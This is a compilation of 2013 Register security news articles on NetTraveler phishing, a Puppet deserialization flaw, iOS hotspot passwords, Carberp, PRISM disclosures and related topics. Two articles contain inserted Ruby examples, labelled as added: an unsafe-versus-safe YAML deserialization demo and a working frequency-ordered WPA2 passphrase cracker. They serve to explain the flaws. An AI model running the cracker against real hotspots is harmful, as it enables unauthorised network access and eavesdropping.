STE WILLIAMS

Chinese hackers launch PRISM scare campaign


The Chinese group behind the recently discovered NetTraveler attacks is now using widespread interest in the infamous National Security Agency (NSA) PRISM surveillance program to encourage users to open malicious email attachments, it has emerged.

Brandon Dixon of the 9bplus blog said he came across an email uploaded to VirusTotal entitled “CIA’s Prism Watchlist”.


The intended recipient of the message was a Yahoo account associated with the Regional Tibet Youth Congress in Mundgod, India, he added. The sender address was apparently faked to approximate “Jill Kelley” – the woman whose complaints of harassment prompted the investigation which led to the resignation of former CIA boss David Petraeus.

The Word doc attached was named “Monitored List 1.doc”, containing malware designed to exploit the same vulnerability (CVE-2012-0158) favoured by the NetTraveler gang, Dixon wrote.

“It’s funny to note that these actors are keeping up with their same techniques and infrastructure (not all of it) despite being 100 per cent outed,” he added. “Again, this sort of behaviour shows poor operational security or a complete lack of care.”

The NetTraveler attacks were first brought to light by Kaspersky Lab earlier this month, when researchers at the AV vendor revealed that the campaign had successfully compromised more than 350 high profile victims in 40 countries, with the malware in question having been active since 2004.

Key targets included embassies, oil and gas corporations, research institutes, military contractors and governments.

Tibetan and Uyghur activists were also among those targeted by the group of 50-odd individuals – usually a tell-tale sign of Chinese involvement.

Kaspersky added that most members were native Chinese speakers. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/19/prism_nettraveler_email_malware/

EU Justice Department stalls India’s security clearance


India’s outsourcing giants are likely to face more delays in their frustrated bid to tap a potential IT services market worth $30 billion, after a report emerged suggesting the EU still has big data security concerns with the country.

The EU and India have been trying to finalise their Broad-based Trade and Investment Agreement since 2006, with the goal of breaking down trade barriers, but progress in the past few months has been slow, according to The Hindu.


One of New Delhi’s major requests as part of the deal is for the country to be recognised as a “data secure destination”, an accreditation which could increase the country’s outsourcing revenue from the EU from $20bn to $50bn, according to Nasscom’s Data Security Council of India.

Although the EU Justice Department’s study into India’s data protection regime has not yet been completed, mutterings suggest it has identified significant gaps in local laws which could require time-consuming legislative amendments.

“The recent communication from the EU Justice Department is worrying for us as it indicates that the EU is not willing to offer us data secure status till we make changes in our systems. This could take a long time as it may also require legislative changes,” a Commerce Department official told The Hindu.

“It is very clear that the EU is not in any hurry to give us data secure status. This would hamper the trade talks further.”

The thorough audit demanded by the EU would seem appropriate given the data breaches at Indian IT services firms periodically come to light.

For example, news broke a year ago that corrupt staff in local call centres were systematically selling on the personal details of millions of British customers.

It’s a problem which was highlighted in February by prime minister David Cameron, who during a trade visit to India signed a deal promising “an unprecedented level of co-operation with India on security issues”.

The joint task force which will be set up between the two countries will see the UK share its expertise in tackling data security with India in order to better secure the increasing amount of data stored on servers in the sub-continent. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/19/india_outsourcing_data_security_woes_eu/

Remote code execution vuln appears in Puppet


Puppet Labs has blasted out a security advisory about a vulnerability in the popular infrastructure management tool Puppet.

The CVE-2013-3567 (Unauthenticated Remote Code Execution Vulnerability) warning was issued by Puppet Labs on Tuesday, and advises all Puppet users to upgrade to versions 2.7.22, 3.2.2 or later, and paid-for customers of Puppet Enterprise to move to 2.8.2.


The vulnerability is serious as it allows for code to be executed remotely.

“When making REST api calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload,” the company wrote.
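The deserialization pattern the advisory describes, reduced to an added Ruby example (Puppet's own language) that is not Puppet's code: a `Report` class the server expects from clients, a `Gadget` class standing in for any attacker-useful class already loaded in the server process, and two handlers. The vulnerable one lets the YAML tag choose the class and then calls a method on whatever came back; the hardened one accepts only plain mappings and constructs the object itself. The class names, the `summary` method and the YAML documents are constructed for the illustration; `YAML.unsafe_load` is used where it exists because newer Psych made `YAML.load` safe by default, so the 2013 behaviour has to be asked for explicitly.

```ruby
require 'yaml'

# Legitimate type the (hypothetical) master expects an agent to send.
class Report
  attr_reader :host, :status
  def initialize(host, status)
    @host, @status = host, status
  end

  def summary
    "#{@host}: #{@status}"
  end
end

# Stand-in for an attacker-useful class that already exists in the server process.
# Real gadgets are library classes whose methods have dangerous side effects;
# this constructed one only records that it ran so the effect is visible.
class Gadget
  def summary
    $gadget_log ||= []
    $gadget_log << @cmd            # @cmd was set by the attacker's YAML, not by this process
    "GADGET EXECUTED: #{@cmd}"
  end
end

# Newer Psych (Ruby 3.1+) makes YAML.load refuse arbitrary classes; unsafe_load restores
# the behaviour the 2013 advisory is about, so the example behaves the same on old and new Ruby.
def full_deserialize(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Vulnerable pattern: the wire format picks the class, the server calls a method on it.
def handle_report_unsafe(doc)
  obj = full_deserialize(doc)
  obj.summary
end

# Hardened pattern: only scalars and mappings are accepted, every field is validated,
# and the server decides which class gets instantiated.
def handle_report_safe(doc)
  data = YAML.safe_load(doc)
  raise ArgumentError, "expected a mapping" unless data.is_a?(Hash)
  host, status = data["host"], data["status"]
  raise ArgumentError, "missing fields" unless host.is_a?(String) && status.is_a?(String)
  raise ArgumentError, "bad status #{status.inspect}" unless %w[changed unchanged failed].include?(status)
  Report.new(host, status).summary
rescue Psych::DisallowedClass, Psych::SyntaxError => e
  raise ArgumentError, "rejected: #{e.message}"
end

# Constructed sample documents: what an honest agent sends, and what an attacker sends.
LEGIT_YAML_OBJ   = "--- !ruby/object:Report\nhost: web01\nstatus: changed\n"
LEGIT_YAML_PLAIN = "---\nhost: web01\nstatus: changed\n"
ATTACKER_YAML    = "--- !ruby/object:Gadget\ncmd: id\n"

if __FILE__ == $0
  puts handle_report_unsafe(LEGIT_YAML_OBJ)   # web01: changed
  puts handle_report_unsafe(ATTACKER_YAML)    # GADGET EXECUTED: id
  puts handle_report_safe(LEGIT_YAML_PLAIN)   # web01: changed
  begin
    handle_report_safe(ATTACKER_YAML)
  rescue ArgumentError => e
    puts e.message                            # rejected: Tried to load unspecified class: Gadget
  end
end
```

The point of the hardened handler is not the `safe_load` call by itself but that the server, not the client, chooses the class that gets built; a `permitted_classes` allow-list is only as safe as the methods on every class it admits.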

Puppet is an open source configuration management and automation tool, and its development is stewarded by Puppet Labs, which makes the commercial version, Puppet Enterprise. VMware was the sole investor in the company’s $30 million fourth funding round in January.

One alternative to Puppet is Chef, which is made by Opscode. Chef has been backed heavily by Amazon Web Services and sits inside the company’s OpsWorks control layer. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/puppet_security_vuln/

Apple’s screw-up leaves tethered iPhones easily crackable


iPhones being used as Wi-Fi hotspots are open to attack because of lax security protocols in the automatic password generation system Apple has in place, according to new research from the University of Erlangen in Germany.

The paper, “Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots” by Andreas Kurtz, Felix Freiling, and Daniel Metz, found that the seemingly random password iOS generates for hotspots is simple to crack. It consists of four to six characters followed by a four-digit number string.


As a test, the team downloaded a 52,500-word dictionary from an open source version of Scrabble, added number-generating code, and cracked the iOS password system every time – although the team points out it isn’t suggesting Apple used the same dictionary. Using an AMD Radeon HD 6990 GPU, the average time to crack was 59 minutes – which is interesting, but hardly practical.

So the team then reverse-engineered the iOS word list used for password generation, using “static and dynamic analysis”, tools like GNU Debugger, and by manually going through the ARM disassembly of the relevant iOS frameworks. They found Apple uses English-language words of between four and six letters from a dictionary copyrighted by Lernout & Hauspie Speech Products.

“Only 1,842 different entries of that dictionary are taken into consideration,” the paper states. “Consequently, any default password used within an arbitrary iOS mobile hotspot, is based on one of these 1,842 different words. This fact reduced the search space of our initial brute force attack by more than 96% and thus increased the overall cracking speed significantly.”

In addition, the selection of words picked for passwords was skewed. “Suave” was used 0.08 per cent of the time, “subbed” cropped up 0.76 per cent and “head” 0.53 per cent – well above the roughly 0.054 per cent each word would get under a uniform pick from 1,842 entries, and for the most common words around ten times it. By front-loading these words into the attack, the chances of cracking a password quickly are greatly increased.

The team also upgraded their hardware to bring search times down, building a box with four AMD Radeon HD 7970 units that could burn through 390,000 guesses per second. This cut the time to crack automatically generated passwords down to 24 seconds, or 52 seconds using a single AMD Radeon HD 6990 GPU. The team recommends that users specify their own hotspot password instead of accepting the generated one.
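The attack the paper describes, reduced to an added Ruby example that is not the researchers’ Hotspot Cracker: the candidate space is one word followed by four digits, words are tried in observed-frequency order, and each guess is checked by deriving the WPA2 pairwise master key (PBKDF2-HMAC-SHA1 over the SSID, 4,096 iterations, 32 bytes) and comparing it with the target. The eight-word list and the SSID are constructed stand-ins for the real 1,842-word list (which the page does not reproduce), the per-word frequencies for the three named words are the paper’s figures with every other word assumed uniform, and comparing against a known PMK stands in for the real check against the MIC of a captured four-way handshake. The timing helpers only restate the arithmetic behind the paper’s 24-second figure at 390,000 guesses per second.

```ruby
require 'openssl'

# Constructed stand-in for the iOS word list; the real list has 1,842 entries.
WORDLIST = %w[suave subbed head apple cloud river stone light]
# Per-word pick probabilities reported by the paper for the three named words.
OBSERVED_FREQ = { "subbed" => 0.0076, "head" => 0.0053, "suave" => 0.0008 }
# Probability a word would get under a uniform pick from the real 1,842-word list.
UNIFORM = 1.0 / 1842

# Words most likely to have been chosen by the generator come first.
def ranked_words(words, freq)
  words.sort_by { |w| -freq.fetch(w, UNIFORM) }
end

# Yields "<word><dddd>" candidates in priority order; 10,000 suffixes per word.
def each_candidate(words, freq)
  return enum_for(:each_candidate, words, freq) unless block_given?
  ranked_words(words, freq).each do |w|
    10_000.times { |n| yield format("%s%04d", w, n) }
  end
end

# WPA2 PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32); this is the per-guess cost.
def wpa2_pmk(passphrase, ssid)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(passphrase, ssid, 4096, 32)
end

# Returns [passphrase, number_of_guesses] or nil if the space is exhausted.
def crack(target_pmk, ssid, words, freq)
  each_candidate(words, freq).each_with_index do |cand, i|
    return [cand, i + 1] if wpa2_pmk(cand, ssid) == target_pmk
  end
  nil
end

# Total candidates for a word list of the given size.
def keyspace(n_words, digits = 4)
  n_words * 10**digits
end

# Average time to hit a uniformly placed password: half the keyspace at the given rate.
def expected_seconds(n_words, guesses_per_second)
  keyspace(n_words) / 2.0 / guesses_per_second
end

if __FILE__ == $0
  ssid   = "iPhone"                                 # constructed SSID
  target = wpa2_pmk("subbed0042", ssid)             # constructed victim password
  cand, tries = crack(target, ssid, WORDLIST, OBSERVED_FREQ)
  puts "recovered #{cand} after #{tries} guesses"
  puts "full iOS keyspace: #{keyspace(1842)} candidates"
  puts format("expected time at 390,000 guesses/s: %.1f s", expected_seconds(1842, 390_000))
end
```

Frequency ordering is what makes the difference between the average case and the lucky case: a password built on one of the over-represented words falls within the first few tens of thousands of guesses, while a user-chosen passphrase of reasonable length is outside this keyspace altogether.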

As a test case, the team built an iOS application dubbed “Hotspot Cracker” which can be used to try out the attack on a target phone. This is limited by the processing power of the smartphone, but can be used in conjunction with a cloud password-cracking service such as CloudCracker for better results.

Once the password has been cracked, the operator can piggyback on the hotspot’s bandwidth, stage a man-in-the-middle attack for eavesdropping, and get access to files stored on the device. Jailbroken iPhones are extra risky since they could allow access to the basic iPhone system services code.

While the researchers concentrated on Apple, they note that other mobile operating systems shouldn’t get too smug. Microsoft’s Windows Phone 8 uses a similar password system that doesn’t even use words, relying instead on eight-digit number strings alone. Android is much better, but there have been cases of manufacturers such as HTC dumbing down password generation for some handsets, the authors report.

“The results of our analysis have shown that the mobile hotspot feature of smart devices increases the attack surface in several ways,” the team concludes. “As the default password of an arbitrary iOS hotspot user can be revealed within seconds, attacks on mobile hotspots might have been underestimated in the past and might be an attractive target in the future.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/iospoor_passwords_crackable_24_seconds/

Tor users locked out of Facebook after wave of dodgy traffic


Users of the Tor traffic anonymizing service are currently locked out of Facebook after a flood of dodgy traffic triggered an automatic lockdown by the social network’s security systems.

Given the paranoid post-PRISM times we live in, the outage on Tuesday caused a certain amount of online panic. A report highlighting the issue briefly topped the front page on Reddit, before both Facebook and Tor told users there was nothing to worry about.


“Facebook is not blocking Tor deliberately,” a Facebook spokesman told El Reg in a statement. “However, a high volume of malicious activity across Tor exit nodes triggered Facebook’s site integrity systems which are designed to protect people who use the service. Tor and Facebook are working together to find a resolution.”

Tor too was quick to reassure users that this wasn’t the beginning of a crackdown on access to Facebook, although there’s no public word yet as to the specific type of traffic that triggered the shutdown. In a blog post, it assured users of Tor systems that it was working with Facebook on this, and that they would be able to get their daily dose of birthday reminders, cat pictures, and web games as soon as the problem was fixed.

There’s been an upsurge of interest in the Tor system ever since the revelations by NSA whistleblower Ed Snowden about the extent of domestic and international data surveillance by the US intelligence services. Tor uses a network of relays to protect some of the activities of its users, but the organization has warned that the system isn’t perfect.

“The core Tor software’s job is to conceal your identity from your recipient, and to conceal your recipient and your content from observers on your end,” it said. “By itself, Tor does not protect the actual communications content once it leaves the Tor network. This can make it useful against some forms of metadata analysis, but this also means Tor is best used in combination with other tools.”

The group recommends using the HTTPS Everywhere browser plug-in to encrypt traffic to websites when possible, to do the same with email traffic using TorBirdy and Enigmail, and consider shifting to a decentralized social network such as Diaspora.

That said, a lot of work needs to be done to toughen up the privacy protection of the Tor system, and the group is running a donations page to fund development and is on the lookout for volunteer coders to help out. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/facebook_blocks_tor_traffic_over_security/

Yahoo! joins! rivals! in! PRISM! data! request! admission!


Yahoo! has become the latest big-hitting American tech firm to reveal exactly how much information it has handed to US spooks.

Marissa Mayer’s outfit joined Apple, Facebook and Microsoft in releasing the number of sensitive data requests made by spies and law enforcement agencies.


The tech giants want to reassure customers and prospective clients that they are not being spied upon in the wake of the PRISM surveillance scandal.

In a joint statement, CEO Marissa Mayer and general counsel Ron Bell said the firm had processed between 12,000 and 13,000 information requests.

The most common requests involved “fraud, homicides, kidnappings and other criminal investigations”, as well as requests made under the Foreign Intelligence Surveillance Act (FISA). Yahoo was keen to point out that it could not reveal how many FISA requests it received.

Apple said it had received between 4,000 and 5,000 data requests in the same period. Microsoft and Facebook released information covering the latter half of 2012, where the social network said it had processed between 9,000 and 10,000 requests. Microsoft said it had dealt with between 6,000 and 7,000.

“We’ve worked hard over the years to earn our users’ trust and we fight hard to preserve it,” Yahoo!’s statement said.

“Like all companies, Yahoo! cannot lawfully break out FISA request numbers at this time because those numbers are classified. However, we strongly urge the federal government to reconsider its stance on this issue.

“Democracy demands accountability. Recognizing the important role that Yahoo! can play in ensuring accountability, we will issue later this summer our first global law enforcement transparency report, which will cover the first half of the year. We will refresh this report with current statistics twice a year.

“As always, we will continually evaluate whether further actions can be taken to protect the privacy of our users and our ability to defend it. We appreciate—and do not take for granted—the trust you place in us.”

In an interview with non-profit telly broadcaster PBS, President Barack Obama insisted that the NSA spying scheme was legal – and, in a piece of textbook doublespeak, even insisted the programme was “transparent”, despite the fact operations are planned and authorised under a cloak of secrecy.

He said this desire for openness had inspired the creation of a secret court set up under the Foreign Intelligence Surveillance Act, which authorises a programme to harvest American phone records and monitor US servers if it is suspected they are being used by foreign terror suspects.

In a bid to reassure a nervous public, Obama claimed to be setting up a board to monitor privacy and civil liberties, which will also decide how much data spies are allowed to harvest. He also promised to keep the public informed about government surveillance programmes in the future.

“We’re going to have to find ways where the public has an assurance that there are checks and balances in place … that their phone calls aren’t being listened into; their text messages aren’t being monitored; their emails are not being read by some big brother somewhere,” Obama said.

“What I’ve asked the intelligence community to do is see how much of this we can declassify without further compromising the program… And they are in that process of doing so now,” he added.

Edward Snowden, the IT worker behind the PRISM leak, is still at large in Hong Kong and gave a live webchat interview to The Guardian yesterday. He said: “All I can say right now is the US government is not going to be able to cover this up by jailing or murdering me. Truth is coming, and it cannot be stopped.”

Nine tech firms are alleged to be involved in the PRISM programme, although it is not clear if some or all of them would have been unwitting participants. So far, all of the firms have said that they require the police and other government workers to present them with a court order on a case-by-case basis before they will allow access to any data and none have copped to providing unfettered access to the Feds. Apple, for instance, said: “We first heard of the government’s ‘Prism’ program when news organizations asked us about it on June 6.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/yahoo_joins_rival_spookgate_data_request_admission/

Robbing a bank? Carberp toolkit now available for just $5k


Cybercrooks are selling the source code for the Carberp banking Trojan toolkit through underground forums – at just $5,000 a pop.

The sale of the building blocks for the banking Trojan toolkit is a sign of “conflict within the team”, according to Andrey Komarov of Russian security firm Group-IB.

“Some of the members would love to destroy the project and move onto another business or new product,” Komarov told El Reg.

The toolkit for sale consists of the full source code of Carberp, including: comments; web-injects; all the Carberp modules; source code of Gazavar (the worm module); the admin panel for the command and control servers; Windows exploits related to vulnerabilities patched last year (specifically CVE-2012-1864 and CVE-2012-0217); a bootkit module, and many other components. The complete archive weighs in at 5GB.

Forum user “madeinrm” states that he is offering the source code for sale because someone else using the nickname “batman” had already passed on the source code to a third party, apparently against madeinrm’s approval.

Madeinrm said he intends to screen potential customers but is nonetheless looking to sell the hitherto secret code powering the malware to a large number of people, rather than selling it at a higher price through an exclusive deal.

Screenshot of Carberp.

Carberp first emerged on the banking fraud scene around three years ago as a competitor to the dominant financial malware platforms Zeus and SpyEye. Russian police have made a number of arrests involving cybercriminals who used the malware to carry out electronic banking fraud.

Despite this, the core of the group actually developing the malware has remained intact and are continuing with their work, even sub-contracting out aspects of the creation of the code.

“Previously, Group-IB took part in the arrest of some members of Carberp group, which is an international group,” Komarov explained. “For example, this team hired Chinese hackers for bootkit module developing, before starting the Carberp 2 project.”

Group-IB reckons that there are currently around 12 active members within the Carberp gang, most of them from Ukraine or Russia. Some members are thought to live in the European Union.

Komarov compared the circumstances surrounding the release of the Carberp source code with those around the release of the source code for ZeuS two years ago.

“This is very similar to how Zeus was leaked,” he said. “Someone tried to sell its source code too, but then the code was published on one of the filesharing networks hosting for free.”

History appears to be repeating itself: the misunderstandings and conflict that split the Zeus team are now playing out within the Carberp group. The most likely outcome of the rift is a split, with elements going off to work on other malware projects, which might include even more powerful banking Trojans.

“We will probably receive something new instead of Carberp in the very near future,” Komarov concluded. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/carberp_trojan_source_code_sale/

Internet fraud still stings suckers


Australians fell prey to online scams to the tune of around $AUD93.5 million in 2012, and reported nearly 84,000 “scam-related contacts” to the Australian Competition and Consumer Commission (ACCC).

The Commission has just released the results of its 2012 report on scam activity, published as part of Australia’s National Consumer Fraud Week 2013.


There’s good news in the report, since 88 percent of the people reporting scams to the ACCC also reported that they suffered no financial loss (that is, they didn’t fall for the scam), and most of those reporting loss were taken down for less than $500. The latter, the watchdog says, indicates that scammers prefer to buy their suckers in big-box outlets rather than one-by-one.

Out of the 83,803 total reports, just 13 percent – a little under 11,000 – related to computer hacking incidents. The vast majority of scammers worked variations on the advance fee fraud pioneered by Nigerian “419” scams, except that today’s scammer prefers phone calls over e-mail to lay the bait.

Rising through the charts with a bullet is the online shopping scam, up by 65 percent but still only worth $4 million in total.

The Register finds it interesting to extrapolate this data outwards. Australia’s $4 annually per capita loss would, multiplied by the world’s population of 7 billion, suggest that annual online scams are worth around $28 billion – which is somewhat less than the hundreds of billions some surveys suggest.

Australians do, however, appear to be more gullible than Americans. According to the FBI’s Internet Crime Complaint Center (IC3), that country’s reported losses amounted to $525 million in 2012 – a mere $US1.66 per person. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/internet_fraud_still_stings_suckers/

SAP users slack, slow and backward on security


Cross-site scripting, missing authorisation checks, directory traversal and SQL injection make up more than three-quarters of vulnerabilities in SAP environments, according to a presentation by ERPScan’s Alexander Polyakov to RSA Conference Asia Pacific 2013.

And the vulnerable state of the SAP world is increasingly attracting the attention of security researchers, Polyakov said, with nearly 60 percent of vulnerabilities found in 2013 turned up by outsiders.


That’s troubling, he told delegates, because ERPScan is also observing a growing willingness by SAP users to open up interfaces to the Internet, either for remote workers, inter-office connections, or remote management.

As reported by SC Magazine Australia, which attended the conference, Polyakov said “If someone gets access to the SAP they can steal HR data, financial data or corporate secrets … or get access to a SCADA system.”

A successful intrusion into the SAP system could easily mean the “end of the business”, Polyakov claimed.

With a combination of Shodan and Google searches, he told the conference, he was able to identify more than 4,000 Internet-facing SAP environments.

And – whether it’s because owners are lazy or updates are difficult – Polyakov said 35 percent of the systems ERPScan found were using NetWeaver 7 EHP 0, which hasn’t been updated since 2005. Another 19 percent were running software that hasn’t been patched since 2009, and 23 percent ran a version last updated in 2010.

The presentation slides can be found here. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/sap_users_slack_slow_and_backward_on_security/

Number of cops abusing Police National Computer access on the rise


The number of Metropolitan Police officers investigated for misusing a controversial police database has more than doubled in the past five years, The Register can reveal.

Since 2009, a total of 76 officers in London have been investigated for misusing the Police National Computer (PNC), according to figures released under Freedom of Information laws. The PNC keeps records of all a person’s interactions with the police, whether they were found guilty in court or not. It is estimated that more than 9.2 million people have records on the cops’ computer system.


With this amount of data on hand, data security is of paramount importance. Yet the problem of PNC abuse is growing.

In 2009, 12 Met officers in London were probed for unlawfully accessing the PNC, whereas last year 25 officers were put under investigation.

The Met is currently investigating five officers accused of misusing the PNC. Two officers last year “resigned/ retired” following the investigation, according to the figures, and in 2011 two officers were dismissed without notice.

Anyone who has access to the PNC has a treasure trove of information about British people – and not just criminals. It holds vehicle information and details of stolen property, and is linked to the national DNA and biometric databases. Altering any of this information has the potential to be life-changing.

Even very minor misdemeanours are kept on record for life, potentially causing problems for individuals concerned. For instance if someone has been arrested just once – regardless of whether this was wrongful or for a ridiculously trivial crime – that person is banned from the US Visa Waiver scheme, which allows British nationals to get into the States without a visa.

A Metropolitan Police spokeswoman insisted all its staff were trained to obey data protection laws.

She said:

“The MPS expects its staff to behave professionally, ethically and with the utmost of integrity at all times. Any instance where the conduct of our staff brings the MPS into disrepute is treated extremely seriously in line with MPS policy.”

According to reports in national newspapers, some 20,000 people have been wrongly branded a criminal due to mistakes in the information held on the PNC.

The Information Commissioner ordered police forces to delete criminal records from people who have kept their nose clean for decades, but the cops appealed and won the right to keep millions of minor records until a person reaches the ripe old age of 100, when they are finally set free from the database.

The police are very sensitive about reducing the amount of data held on the PNC, because the Soham killer Ian Huntley managed to get a job at a school despite having a record on the PNC that linked him with sex crimes and burglaries. The police and social services were slammed for allowing this to happen, making them extra-cautious in the years since.

The police also brought in a new system called the Police National Database, which was introduced in 2011 and allows officers to share information on an estimated 15 million people – about a quarter of the British population.

Anyone who has been naughty in the past can apply to have their record erased, but they must persuade a top cop that their situation is “exceptional” – which basically means that appeals will be refused in most cases.

Nick Pickles, director of Big Brother Watch, commented:

“The police national computer is one of the least transparent databases operated by the state, with much of its contents never proven in court. It offers a detailed insight to people’s lives, so it is hardly surprising that it is prone to abuse.

“The broader issue is that without any real audit process, these figures are likely to be the tip of the iceberg.”

Are you concerned about the PNC? Did you work on building the system or are you involved with building similar systems? The Reg wants to hear from you. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/dozens_of_london_cops_investigated_for_misusing_controversial_police_database/